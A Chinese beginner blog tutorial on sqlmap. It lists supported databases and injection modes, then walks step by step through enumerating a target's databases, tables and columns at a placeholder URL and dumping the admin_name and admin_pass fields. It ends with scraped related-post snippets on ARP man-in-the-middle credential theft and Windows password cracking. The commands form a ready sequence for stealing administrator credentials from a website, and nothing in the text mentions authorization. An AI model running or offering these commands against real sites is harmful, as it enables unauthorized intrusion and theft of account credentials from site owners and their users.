首先,先简单介绍下sqlmap

简介:

sqlmap是一种开源的

支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式:

UNION query SQL injection(可联合查询注入

Error-based SQL injection(报错型注入)

Boolean-based blind SQL injection(布尔型注入)

Time-based blind SQL injection(基于时间延迟注入)

Stacked queries SQL injection(可多语句查询注入)

基本用法:

-u 使用sqlmap

--dbs 获取数据库名

--tables 获取表名

--columns 获取字段名

--dump 获取字段内容

实战:

1.获取库名

python2 sqlmap.py -u "http://xxx.com" --dbs

成功获取库名

接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。

2.继续获取表名

python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables

看见admin 看来离目标 不远了

3.获取字段名

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns

看到admin_name admin _pass  果然就在这

4.获取用户名,密码

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump

介绍完毕,小白教学,大佬勿喷,谢谢大家。

sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码相关推荐

  1. js获取classname值_利用js获取元素class值的两种方法

    我们有时为了达到某种效果,需要以元素的class值为条件做判断. 我们如何利用JavaScript获取元素class的值?我们先看下面代码: x=document.getElementsByTagNa ...

  2. python获取网络信息_利用psutil获取网络信息

    获取网络总的io信息 [root@bogon python_auto]# vim net.py !/usr/bin/env python import psutil net_information = ...

  3. 宝塔mysql管理员初始密码_宝塔面板忘记管理员用户名密码简单有效解决方法

    有些学做网站学员使用服务器建网站,并且安装了宝塔面板,建设好之后需要登录后台,但是有时会忘记账号和密码,应该怎么办?或者是在使用的过程中忘记了登陆密码,应该怎么解决呢?下面介绍一下宝塔面板管理员密码忘 ...

  4. 5.2.2 利用arp中间人攻击获取管理员账号密码

    一.arp协议简述: ARP即地址解析协议,用于IP地址到MAC地址的映射,即由目标IP找到对应的MAC地址.ARP协议特点是"广播请求,单播回应". 二.arp欺骗原理:(看图, ...

  5. 利用SharedPreferences完成记住账号密码的功能

    利用SharedPreferences完成记住账号密码的功能 效果图: 记住密码后,再次登录就会出现账号密码,否则没有. 分析: SharedPreferences可将数据存储到本地的配置文件中 Sh ...

  6. 攻击 | 破解windows7密码(利用PE系统破解XP密码)

    攻击 | 破解windows7密码(利用PE系统破解XP密码) 引子-破解win7密码 背景-虚拟环境 原理 实现过程 引子-破解win7密码 在学校安排的网络空间安全实训过程中,了解到破解windo ...

  7. win10忘记密码_惊!黑客破解电脑密码竟然这么简单~

    如果你忘记了你的Windows开机密码你会怎么找回呢?相信大家最为常用的方法就是用U盘做个PE系统,利用PE系统中的密码修改/清除工具来解决忘记密码问题.这种方法的原理是通过利用工具来修改Window ...

  8. 利用正则表达式简单判断账号密码等

    利用正则表达式简单判断账号密码等 1.判断账号必须为英文,不能有其他符号,限制长度范围6-12之间 //(pattern\compile\CASE_INSENSITIVE\Matcher\find() ...

  9. 光猫超级管理员账号密码和Telnet登陆

    文章目录 三大运营商默认的超级管理员账号密码 移动 联通 电信 动态密码如何处理 初始化前的准备和初始化后的注册 打开Telnet端口 为user用户提权 公网地址 如何判断运营商是否分配了公网地址 ...

最新文章

  1. libvmi编译问题
  2. MongoDb注意事项
  3. 大学课程重新学习-操作系统
  4. Java设计模式-观察者模式(订阅发布模式)
  5. linux c之用fwrite和fread实现文件的复制
  6. 3dmax里面cr材质转换vr材质_3DMAX零基础入门视频全套教程
  7. c#字符型转化为asc_wap站 utf-8与 gb2312字符编码的转化函数
  8. c语言 l l next,nexttowardl
  9. 去雾综述_图像去雾的算法历史与综述
  10. HNU 实验五 小女孩与楼梯
  11. 如日中天的Uber到底是用什么开发语言做到的?
  12. 计算机地图制图的点状符号制作,点状符号
  13. Java编程入门:使用Eclipse快捷键
  14. 单片机C语言code关键字
  15. 图神经网络学习笔记(2)——图滤波器
  16. word 分栏后转html,word文档分栏后的页码设置方法
  17. 一些高阶矩的介绍,峰度和偏度
  18. 外卖项目05---套餐管理业务开发
  19. bootstrap-table修改列名
  20. The web application [] appears to have started a thread named [thread-0]

热门文章

  1. CNN可视化又添新作,南大开源Group-CAM:高效的显著图生成方法|CVPR2021
  2. 优秀!这位70后硕士,入围中国工程院院士候选人!
  3. 有哪些好的科研和学习习惯?
  4. linux 环境下,yum 安装redis
  5. linux 环境 下面 yum 安装nginx
  6. js如何动态的加载js文件
  7. Bioinformatics | 预测药物相互作用的多模式深度学习框架
  8. python画图,使用matplotlib和seaborn来设置图形的字体大小,坐标轴的线宽,风格,取值范围
  9. convert-----Linux中的图片处理工具
  10. Nature | 复旦大学类脑研究院生物医学人工智能团队构建全球微生物基因目录